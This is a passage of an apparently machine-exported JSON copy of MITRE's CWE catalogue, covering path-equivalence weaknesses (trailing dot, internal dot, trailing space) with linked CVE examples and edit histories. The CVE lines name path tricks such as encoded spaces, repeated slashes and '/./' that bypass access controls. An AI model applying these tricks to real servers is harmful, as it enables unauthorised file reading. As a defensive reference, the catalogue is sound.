dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1986"},{"Reference":"CVE-2004-2213","Description":"Source code disclosure using trailing dot or trailing encoding space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2213"},{"Reference":"CVE-2005-3293","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3293"},{"Reference":"CVE-2004-0061","Description":"Bypass directory access restrictions using trailing dot in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0061"},{"Reference":"CVE-2000-1133","Description":"Bypass directory access restrictions using trailing dot in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1133"},{"Reference":"CVE-2001-1386","Description":"Bypass check for \\".lnk\\" extension using \\".lnk.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386"},{"Reference":"CVE-2001-0693","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0693"},{"Reference":"CVE-2001-0778","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0778"},{"Reference":"CVE-2001-1248","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1248"},{"Reference":"CVE-2004-0280","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0280"},{"Reference":"CVE-2005-0622","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0622"},{"Reference":"CVE-2005-1656","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1656"},{"Reference":"CVE-2002-1603","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1603"},{"Reference":"CVE-2001-0054","Description":"Multi-Factor Vulnerability (MVF). directory traversal and other issues in FTP server using Web encodings such as \\"%20\\"; certain manipulations have unusual side effects.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0054"},{"Reference":"CVE-2002-1451","Description":"Trailing space (\\"+\\" in query string) leads to source code disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1451"},{"Reference":"CVE-2000-0293","Description":"Filenames with spaces allow arbitrary file deletion when the product does not properly quote them; some overlap with path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0293"},{"Reference":"CVE-2001-1567","Description":"\\"+\\" characters in query string converted to spaces before sensitive file/extension (internal space), leading to bypass of access restrictions to the file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1567"},{"Reference":"CVE-2002-0253","Description":"Overlaps infoleak","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0253"},{"Reference":"CVE-2001-0446","Description":"Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0446"},{"Reference":"CVE-2004-0334","Description":"Bypass Basic Authentication for files using trailing \\"/\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0334"},{"Reference":"CVE-2001-0893","Description":"Read sensitive files with trailing \\"/\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0893"},{"Reference":"CVE-2001-0892","Description":"Web server allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0892"},{"Reference":"CVE-2004-1814","Description":"Directory traversal vulnerability in server allows remote attackers to read protected files via .. (dot dot) sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1814"},{"Reference":"BID:3518","Description":"Source code disclosure","Link":"http://www.securityfocus.com/bid/3518"},{"Reference":"CVE-2002-1483","Description":"Read files with full pathname using multiple internal slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"},{"Reference":"CVE-1999-1456","Description":"Server allows remote attackers to read arbitrary files via a GET request with more than one leading / (slash) character in the filename.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1456"},{"Reference":"CVE-2004-0578","Description":"Server allows remote attackers to read arbitrary files via leading slash (//) characters in a URL request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0578"},{"Reference":"CVE-2002-0275","Description":"Server allows remote attackers to bypass authentication and read restricted files via an extra / (slash) in the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0275"},{"Reference":"CVE-2004-1032","Description":"Product allows local users to delete arbitrary files or create arbitrary empty files via a target filename with a large number of leading slash (/) characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1032"},{"Reference":"CVE-2002-1238","Description":"Server allows remote attackers to bypass access restrictions for files via an HTTP request with a sequence of multiple / (slash) characters such as http://www.example.com///file/.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1238"},{"Reference":"CVE-2004-1878","Description":"Product allows remote attackers to bypass authentication, obtain sensitive information, or gain access via a direct request to admin/user.pl preceded by // (double leading slash).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1878"},{"Reference":"CVE-2005-1365","Description":"Server allows remote attackers to execute arbitrary commands via a URL with multiple leading \\"/\\" (slash) characters and \\"..\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1365"},{"Reference":"CVE-2000-1050","Description":"Access directory using multiple leading slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1050"},{"Reference":"CVE-2001-1072","Description":"Bypass access restrictions via multiple leading slash, which causes a regular expression to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1072"},{"Reference":"CVE-2004-0235","Description":"Archive extracts to arbitrary files using multiple leading slash in filenames in the archive.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0235"},{"Reference":"CVE-2002-1078","Description":"Directory listings in web server using multiple trailing slash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1078"},{"Reference":"CVE-2004-0847","Description":"ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) \\"\\\\\\" (backslash) or (2) \\"%5C\\" (encoded backslash), aka \\"Path Validation Vulnerability.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847"},{"Reference":"CVE-2000-0004","Description":"Server allows remote attackers to read source code for executable files by inserting a . (dot) into the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0004"},{"Reference":"CVE-2002-0304","Description":"Server allows remote attackers to read password-protected files via a /./ in the HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0304"},{"Reference":"BID:6042","Description":"Input Validation error","Link":"http://www.securityfocus.com/bid/6042"},{"Reference":"CVE-1999-1083","Description":"Possibly (could be a cleansing error)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1083"},{"Reference":"CVE-2004-0815","Description":"\\"/./////etc\\" cleansed to \\".///etc\\" then \\"/etc\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815"},{"Reference":"CVE-2002-0112","Description":"Server allows remote attackers to view password protected files via /./ in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0112"},{"Reference":"CVE-2004-0696","Description":"List directories using desired path and \\"*\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0696"},{"Reference":"CVE-2002-0433","Description":"List files in web server using \\"*.ext\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"},{"Reference":"CVE-2001-1152","Description":"Proxy allows remote attackers to bypass denylist restrictions and connect to unauthorized web servers by modifying the requested URL, including (1) a // (double slash), (2) a /SUBDIR/.. where the desired file is in the parentdir, (3) a /./, or (4) URL-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1152"},{"Reference":"CVE-2000-0191","Description":"application check access for restricted URL before canonicalization","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191"},{"Reference":"CVE-2005-1366","Description":"CGI source disclosure using \\"dirname/../cgi-bin\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1366"},{"Reference":"CVE-1999-0012","Description":"Multiple web servers allow restriction bypass using 8.3 names instead of long names","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0012"},{"Reference":"CVE-2001-0795","Description":"Source code disclosure using 8.3 file name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0795"},{"Reference":"CVE-2005-0471","Description":"Multi-Factor Vulnerability. Product generates temporary filenames using long filenames, which become predictable in 8.3 format.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0471"}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Path Equivalence"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO02-C","Entry_Name":"Canonicalize path names originating from untrusted sources"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"3"}}},"Notes":{"Note":{"#text":"Some of these manipulations could be effective in path traversal issues, too.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Path Equivalence","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Path Equivalence","attr":{"@_Date":"2009-05-27"}}]}},"42":{"attr":{"@_ID":"42","@_Name":"Path Equivalence: \'filename.\' (Trailing Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of trailing dot (\'filedir.\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1114","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1114"},{"Reference":"CVE-2002-1986","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1986"},{"Reference":"CVE-2004-2213","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2213"},{"Reference":"CVE-2005-3293","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3293"},{"Reference":"CVE-2004-0061","Description":"Bypass directory access restrictions using trailing dot in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0061"},{"Reference":"CVE-2000-1133","Description":"Bypass directory access restrictions using trailing dot in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1133"},{"Reference":"CVE-2001-1386","Description":"Bypass check for \\".lnk\\" extension using \\".lnk.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Trailing Dot - \'filedir.\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Trailing Dot - \'filedir.\'","attr":{"@_Date":"2008-04-11"}}}},"43":{"attr":{"@_ID":"43","@_Name":"Path Equivalence: \'filename....\' (Multiple Trailing Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple trailing dot (\'filedir....\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"42","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"163","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"BUGTRAQ:20040205","Description":"Apache + Resin Reveals JSP Source Code ...","Link":"http://marc.info/?l=bugtraq&m=107605633904122&w=2"},{"Reference":"CVE-2004-0281","Description":"Multiple trailing dot allows directory listing","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0281"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Trailing Dot - \'filedir....\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Trailing Dot - \'filedir....\'","attr":{"@_Date":"2008-04-11"}}}},"44":{"attr":{"@_ID":"44","@_Name":"Path Equivalence: \'file.name\' (Internal Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of internal dot (\'file.ordir\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Internal Dot - \'file.ordir\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"An improper attempt to remove the internal dots from the string could lead to CWE-181 (Incorrect Behavior Order: Validate Before Filter).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Internal Dot - \'file.ordir\'","attr":{"@_Date":"2008-04-11"}}}},"45":{"attr":{"@_ID":"45","@_Name":"Path Equivalence: \'file...name\' (Multiple Internal Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple internal dot (\'file...dir\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"44","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"165","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Internal Dot - \'file...dir\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"An improper attempt to remove the internal dots from the string could lead to CWE-181 (Incorrect Behavior Order: Validate Before Filter).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Internal Dot - \'file...dir\'","attr":{"@_Date":"2008-04-11"}}}},"46":{"attr":{"@_ID":"46","@_Name":"Path Equivalence: \'filename \' (Trailing Space)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of trailing space (\'filedir \') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"289","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0693","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0693"},{"Reference":"CVE-2001-0778","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0778"},{"Reference":"CVE-2001-1248","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1248"},{"Reference":"CVE-2004-0280","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0280"},{"Reference":"CVE-2004-2213","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2213"},{"Reference":"CVE-2005-0622","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0622"},{"Reference":"CVE-2005-1656","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1656"},{"Reference":"CVE-2002-1603","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1603"},{"Reference":"CVE-2001-0054","Description":"Multi-Factor Vulnerability (MVF). directory traversal and other issues in FTP server using Web encodings such as \\"%20\\"; certain manipulations have unusual side effects.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0054"},{"Reference":"CVE-2002-1451","Description":"Trailing space (\\"+\\" in query string) leads to source code disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1451"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Trailing Space - \'filedir \'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"649"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Trailing Space - 